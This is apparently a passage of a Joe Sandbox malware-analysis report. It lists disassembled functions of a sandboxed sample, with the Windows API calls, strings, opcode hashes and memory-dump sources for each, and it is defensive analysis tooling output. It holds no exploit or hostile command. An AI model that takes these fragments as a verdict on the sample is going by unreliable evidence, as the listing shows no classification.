Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: ErrorLast
String ID: Could not set permissions on the registry key because it currently does not exist.$Failed to set permissions on registry key (%d).$Setting permissions on registry key: %s\%s
API String ID: 1452528299-4018462623
Opcode ID: b6a47f64f510fce16551a7a9453ce12765f8589f174dbaf3fa05134ae08179ca
Instruction ID: 4334e49d385bf692f2cc32478bc4a2497c1f2fe716dd62bcd395c3eafaa3e5f2
Opcode Fuzzy Hash: b6a47f64f510fce16551a7a9453ce12765f8589f174dbaf3fa05134ae08179ca
Instruction Fuzzy Hash: 9C218370A046445FCB01DBAAD9827EEBBE4EB49314F50817BE408E7392D7B85D05CBA9

Function 00403CA4 Relevance: 7.6, APIs: 5, Instructions: 55memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403CDE
SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403CE9
MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 00403CFC
SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00403D06
MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00403D15

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: ByteCharMultiWide$AllocString
String ID:
API String ID: 262959230-0
Opcode ID: 3d91154ea29cb477aba9f2cf37b6340c14ba569e13ff3378e354d6e20d937e44
Instruction ID: 657f84db466bd1c54801a2b30447fc2084338491f8142acf58a262d5883cef98
Opcode Fuzzy Hash: 3d91154ea29cb477aba9f2cf37b6340c14ba569e13ff3378e354d6e20d937e44
Instruction Fuzzy Hash: FCF0A4917442043BF21025A65C43F6B198CCB82B9BF50053FB704FA1D2D87C9D04427D

Function 004143F0 Relevance: 7.6, APIs: 5, Instructions: 51COMMON

Download Yara Rule

APIs

73A18830.GDI32(00000000,00000000,00000000), ref: 00414429
73A122A0.GDI32(00000000,00000000,00000000,00000000), ref: 00414431
73A18830.GDI32(00000000,00000000,00000001,00000000,00000000,00000000,00000000), ref: 00414445
73A122A0.GDI32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000), ref: 0041444B
73A1A480.USER32(00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000), ref: 00414456

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: A122A18830$A480
String ID:
API String ID: 3325508737-0
Opcode ID: 161378f607458cb0647fc0ae293b672cc47cdd04cd22de7490c53bd54400d8e0
Instruction ID: 307ee49d89b37f6f535ee678b6e17b633f9af621dfcf88cb872c79a1e2d754b8
Opcode Fuzzy Hash: 161378f607458cb0647fc0ae293b672cc47cdd04cd22de7490c53bd54400d8e0
Instruction Fuzzy Hash: A901D47121C3406AD200B63D8C45B9F6BEC8FC6314F05546EF494D7382C97ACC018765

Function 00406FAC Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 156shareCOMMON

Download Yara Rule

APIs

WNetGetUniversalNameA.MPR(00000000,00000001,?,00000400), ref: 0040700B
WNetOpenEnumA.MPR(00000001,00000001,00000000,00000000,?), ref: 00407085
WNetEnumResourceA.MPR(?,FFFFFFFF,?,?), ref: 004070DD

Strings

Z, xrefs: 00407044

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: Enum$NameOpenResourceUniversal
String ID: Z
API String ID: 3604996873-1505515367
Opcode ID: 9cf142189d4ecfc6757bb5486cc46db394a4e60b729a9f9f9915b5c39fe8e999
Instruction ID: 2d8f00a968b5306eb49df96258ffff6df6a72a1db963417fd4edcb7bb2ad48f8
Opcode Fuzzy Hash: 9cf142189d4ecfc6757bb5486cc46db394a4e60b729a9f9f9915b5c39fe8e999
Instruction Fuzzy Hash: C1513070E04208ABDB15DF55CD41A9EBBB9FB49304F1041BAE910BB3D1C778AE458F5A

Function 0044C814 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 126COMMON

Download Yara Rule

APIs

SetRectEmpty.USER32(?), ref: 0044C8A2
DrawTextA.USER32(00000000,00000000,00000000,?,00000D20), ref: 0044C8CD
DrawTextA.USER32(00000000,00000000,00000000,00000000,00000800), ref: 0044C955

Strings

, xrefs: 0044C887

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: DrawText$EmptyRect
String ID:
API String ID: 182455014-2867612384
Opcode ID: 6c05f6fd2de5f0114c24d089b6121ea037cee5e3f80eca8d109fa4c4a1bfdb21
Instruction ID: 68feaf95479c8b0f8d19ac4d8bed049c81d0e9902cdc902b6301711e3864cdc7
Opcode Fuzzy Hash: 6c05f6fd2de5f0114c24d089b6121ea037cee5e3f80eca8d109fa4c4a1bfdb21
Instruction Fuzzy Hash: 435152B0A01248AFDB50DFA5C885BDEBBF8FF49304F08447AE845EB251D7789944CB64

Function 0042EDE8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 106COMMON

Download Yara Rule

APIs

73A1A570.USER32(00000000,00000000,0042EF3C,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 0042EE12

Part of subcall function 0041A1F8: CreateFontIndirectA.GDI32(?), ref: 0041A2B7

SelectObject.GDI32(?,00000000), ref: 0042EE35
73A1A480.USER32(00000000,?,0042EF21,00000000,0042EF1A,?,00000000,00000000,0042EF3C,?,?,?,?,00000000,00000000,00000000), ref: 0042EF14

Strings

...\, xrefs: 0042EEC6

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: A480A570CreateFontIndirectObjectSelect
String ID: ...\
API String ID: 2998766281-983595016
Opcode ID: e7ebfea45444ea9c11b2851c030b1c82e81be4d7c359b89fb9621dfee32d1b04
Instruction ID: f7e46b9156472dd3d3dfb1d2a9ceb23c9820bf6754630174aa29599cfb354949
Opcode Fuzzy Hash: e7ebfea45444ea9c11b2851c030b1c82e81be4d7c359b89fb9621dfee32d1b04
Instruction Fuzzy Hash: E0318170B00128ABDF11EF9AD841BAEB7B9EB48308F91447BF410A7291D7785D45CA69

Function 004547AC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 77COMMON

Download Yara Rule

APIs

ShellExecuteEx.SHELL32(0000003C), ref: 00454848
GetLastError.KERNEL32(0000003C,00000000,00454891,?,?,?), ref: 00454859

Part of subcall function 0042D890: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8A3

Strings

<, xrefs: 00454802
SuG, xrefs: 00454873

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: DirectoryErrorExecuteLastShellSystem
String ID: <$SuG
API String ID: 893404051-1504269210
Opcode ID: 0173540be8187d3cca920cd9054ca9af2117f56a2c32ed9380eed9ddca2bdfeb
Instruction ID: e58c708146c2f721f38e64faa2aac8e88425893723770a95bfdd45a03fe75b0c
Opcode Fuzzy Hash: 0173540be8187d3cca920cd9054ca9af2117f56a2c32ed9380eed9ddca2bdfeb
Instruction Fuzzy Hash: 7D218574A00249ABDB10EF65C88269E7BE8EF49349F50403AF844EB381D7789D498B98

Function 00404D2A Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 72windowCOMMON

Download Yara Rule

APIs

MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00404DC5
ExitProcess.KERNEL32 ref: 00404E0D

Strings

Error, xrefs: 00404DB9
Runtime error at 00000000, xrefs: 00404DBE, 00404DD1

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: ExitMessageProcess
String ID: Error$Runtime error at 00000000
API String ID: 1220098344-2970929446
Opcode ID: 65f8ed0532075a2792cd4408a2c9e4abcf3b0691aeac86d53ce49d1bb586f2e2
Instruction ID: 7c754c0b660761a5bc1c63aadfae0e1dd2c0c13e95eab211716155318e46cc07
Opcode Fuzzy Hash: 65f8ed0532075a2792cd4408a2c9e4abcf3b0691aeac86d53ce49d1bb586f2e2
Instruction Fuzzy Hash: E421CB606442514ADB11AB799C857163B9197E534CF04817BE700B73F2CA7D9C64C7EF

Function 00455DF4 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 65registryCOMMON

Download Yara Rule

APIs

Part of subcall function 0042C7D0: GetFullPathNameA.KERNEL32(00000000,00001000,?), ref: 0042C7F4

Part of subcall function 00403CA4: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403CDE
Part of subcall function 00403CA4: SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403CE9

LoadTypeLib.OLEAUT32(00000000,00000000), ref: 00455E48
RegisterTypeLib.OLEAUT32(00000000,00000000,00000000), ref: 00455E75

Strings

LoadTypeLib, xrefs: 00455E53
RegisterTypeLib, xrefs: 00455E80

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: Type$AllocByteCharFullLoadMultiNamePathRegisterStringWide
String ID: LoadTypeLib$RegisterTypeLib
API String ID: 1312246647-2435364021
Opcode ID: ff476844371f4104c378b253a494915691f6bbf47305687bf7563dfe30fd17cc
Instruction ID: e41936e4c8b07abfc49a8f10cd7ccd4a21eee7bf761b45698a75813e6285fe04
Opcode Fuzzy Hash: ff476844371f4104c378b253a494915691f6bbf47305687bf7563dfe30fd17cc
Instruction Fuzzy Hash: 59119631B00A04AFDB11DFA6CD62A5FB7ADEB89705F10847ABC04D3652DB789E04CA54

Function 0045634C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(00000000,00000B06,00000000,00000000), ref: 00456366
SendMessageA.USER32(00000000,00000B00,00000000,00000000), ref: 00456403

Strings

Failed to create DebugClientWnd, xrefs: 004563CC
Cannot debug. Debugger version ($%.8x) does not match Setup version ($%.8x), xrefs: 00456392

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: MessageSend
String ID: Cannot debug. Debugger version ($%.8x) does not match Setup version ($%.8x)$Failed to create DebugClientWnd
API String ID: 3850602802-3720027226
Opcode ID: c69c87a4a610bb2d85408e1b555d6f8d603e272f230d3717a3ecef290dd31cb1
Instruction ID: 9b4fe9b07e62f64c95e3ed8797323406b80950c852a807cd7dd65319169fa691
Opcode Fuzzy Hash: c69c87a4a610bb2d85408e1b555d6f8d603e272f230d3717a3ecef290dd31cb1
Instruction Fuzzy Hash: 1111E3B06042506FD300AB699C81B5F7BA89B56309F45443BF984DF383D3798C18CBAE

Function 00477194 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55windowkeyboardCOMMON

Download Yara Rule

APIs

Part of subcall function 004242D4: SetWindowTextA.USER32(?,00000000), ref: 004242EC

GetFocus.USER32 ref: 004771FF
GetKeyState.USER32(0000007A), ref: 00477211
WaitMessage.USER32(?,00000000,00477238,?,00000000,0047725F,?,?,00000001,00000000,?,?,?,0047E9E6,00000000,0047F8E7), ref: 0047721B

Strings

Wnd=$%x, xrefs: 004771E3

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: FocusMessageStateTextWaitWindow
String ID: Wnd=$%x
API String ID: 1381870634-2927251529
Opcode ID: 4a336d0fab4478f12607185930d67efd8132ed5f698f2504fd14852207cbbe6e
Instruction ID: 1bcd60996d2698ed373ebf422e897d28d135c5275452f214efeb8338eb806bda
Opcode Fuzzy Hash: 4a336d0fab4478f12607185930d67efd8132ed5f698f2504fd14852207cbbe6e
Instruction Fuzzy Hash: A611CA30604204AFC701EFA9DC41ADE77F8EB49704B9184F6F418E3252D73C6D10CA6A

Function 0046D638 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46timeCOMMON

Download Yara Rule

APIs

FileTimeToLocalFileTime.KERNEL32(000000FF), ref: 0046D640
FileTimeToSystemTime.KERNEL32(?,?,000000FF), ref: 0046D64F

Strings

%.4u-%.2u-%.2u %.2u:%.2u:%.2u.%.3u, xrefs: 0046D6C4
(invalid), xrefs: 0046D6D2

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: Time$File$LocalSystem
String ID: %.4u-%.2u-%.2u %.2u:%.2u:%.2u.%.3u$(invalid)
API String ID: 1748579591-1013271723
Opcode ID: 52d5e1154cf982ec1ea5d8ce260032eaa3f1648937a562aafe09eebef1c1682c
Instruction ID: 0ff0b3c23c5ed0256b313d7d525d52e9a24b5728abf6314cf281cf193483f13b
Opcode Fuzzy Hash: 52d5e1154cf982ec1ea5d8ce260032eaa3f1648937a562aafe09eebef1c1682c
Instruction Fuzzy Hash: 4311F8A090C3909ED340DF2AC44432BBAE4AB89704F04892EF9D8D6381E779C948DB77

Function 00458A84 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 39registryCOMMON

Download Yara Rule

APIs

Part of subcall function 0042DD44: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,00481F57,?,00000001,?,?,00481F57,?,00000001,00000000), ref: 0042DD60

RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,?,00000000,?,00000002,00458BC1,00000000,00458D79,?,00000000,00000000,00000000), ref: 00458AD1

Strings

SOFTWARE\Microsoft\.NETFramework, xrefs: 00458AA4
InstallRoot, xrefs: 00458AC0
.NET Framework not found, xrefs: 00458AE0

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: CloseOpen
String ID: .NET Framework not found$InstallRoot$SOFTWARE\Microsoft\.NETFramework
API String ID: 47109696-2631785700
Opcode ID: 26e598e2510fa9e4a6399a429d897fd92e9f9241c646caba1ec59660a343853d
Instruction ID: 2bdf3aef2c60deecc2fc1a5dc8a42cc53f0a1f71867dabe890c8ddf4abdcbedd
Opcode Fuzzy Hash: 26e598e2510fa9e4a6399a429d897fd92e9f9241c646caba1ec59660a343853d
Instruction Fuzzy Hash: 3AF0A4B17001109BDB10EB1AE845F5B628CDBD1316F20403FF581E7296CE7CDC06CA9A

Function 00481F38 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 39registryCOMMON

Download Yara Rule

APIs

Part of subcall function 0042DD44: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,00481F57,?,00000001,?,?,00481F57,?,00000001,00000000), ref: 0042DD60

RegQueryValueExA.ADVAPI32(?,CSDVersion,00000000,?,?,?,?,00000001,00000000), ref: 00481F79
RegCloseKey.ADVAPI32(?,?,CSDVersion,00000000,?,?,?,?,00000001,00000000), ref: 00481F9C

Strings

System\CurrentControlSet\Control\Windows, xrefs: 00481F46
CSDVersion, xrefs: 00481F70

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: CSDVersion$System\CurrentControlSet\Control\Windows
API String ID: 3677997916-1910633163
Opcode ID: 220f1d90dc9d01e70f51e07e52e95aefa24747c0d438b7241eb26c36c3cc7d10
Instruction ID: c869957850822339a6d2b86bec0dd1f4db8a349efa053aa20552817ac18695c5
Opcode Fuzzy Hash: 220f1d90dc9d01e70f51e07e52e95aefa24747c0d438b7241eb26c36c3cc7d10
Instruction Fuzzy Hash: 94F01975E4020DAADF10EAD18C45BAF73BCAB04708F104967FB10E7290E779AA45CB5A

Function 0042D8BC Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 27libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,GetSystemWow64DirectoryA,?,004531BA,00000000,0045325D,?,?,00000000,00000000,00000000,00000000,00000000,?,00453529,00000000), ref: 0042D8D6
GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0042D8DC

Strings

GetSystemWow64DirectoryA, xrefs: 0042D8CC
kernel32.dll, xrefs: 0042D8D1

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: GetSystemWow64DirectoryA$kernel32.dll
API String ID: 1646373207-4063490227
Opcode ID: 2d19be5e9d3f7a56a1e4775df43ad67afc209c47152956cd3dcb438fc33ecc86
Instruction ID: 226daeffb333c7fd56417753f7bf411e9e50fb36e69144697282a220664082a3
Opcode Fuzzy Hash: 2d19be5e9d3f7a56a1e4775df43ad67afc209c47152956cd3dcb438fc33ecc86
Instruction Fuzzy Hash: 8CE026E0F00B0012D70035BA2C83B6B108D8B88729FA0443F7899F62C7DDBCDAC40AAD

Function 0042E9C8 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 23libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(user32.dll,ShutdownBlockReasonDestroy,?,00000000,0042E944), ref: 0042E9D6
GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042E9DC

Strings

ShutdownBlockReasonDestroy, xrefs: 0042E9CC
user32.dll, xrefs: 0042E9D1

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: ShutdownBlockReasonDestroy$user32.dll
API String ID: 1646373207-260599015
Opcode ID: d728472e8339f2ffff8a63abc478e5e6a1fb2f9fde307aaa74d21bec7cd435e2
Instruction ID: 6bc70aa2ebf4dd36f12f6c88582c327b68e43ec59fad8d4ed568611576548916
Opcode Fuzzy Hash: d728472e8339f2ffff8a63abc478e5e6a1fb2f9fde307aaa74d21bec7cd435e2
Instruction Fuzzy Hash: 05D0C7D3351733566D9071FB3CC19AB018C8A116B53540177F500F6141D99DCC4115AD

Function 00496E2C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 9libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(user32.dll,DisableProcessWindowsGhosting,00497107,00000001,00000000,0049712B), ref: 00496E36
GetProcAddress.KERNEL32(00000000,user32.dll), ref: 00496E3C

Strings

DisableProcessWindowsGhosting, xrefs: 00496E2C
user32.dll, xrefs: 00496E31

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: DisableProcessWindowsGhosting$user32.dll
API String ID: 1646373207-834958232
Opcode ID: d6cd7607be6575f9249c3beb1cc04364ec349a9d743fe925dab93869ddeda9f1
Instruction ID: 4607b44a290c0083fd8a3bbebdee3b5c85a8181a3f50ff176a2b10a78ee17b7d
Opcode Fuzzy Hash: d6cd7607be6575f9249c3beb1cc04364ec349a9d743fe925dab93869ddeda9f1
Instruction Fuzzy Hash: 0BB012CA68170450CC1032F28C07E1F1C0C4C80769B1604373C00F10C3CF6CD800483E

Function 00463D1C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 8libraryloaderCOMMON

Download Yara Rule

APIs

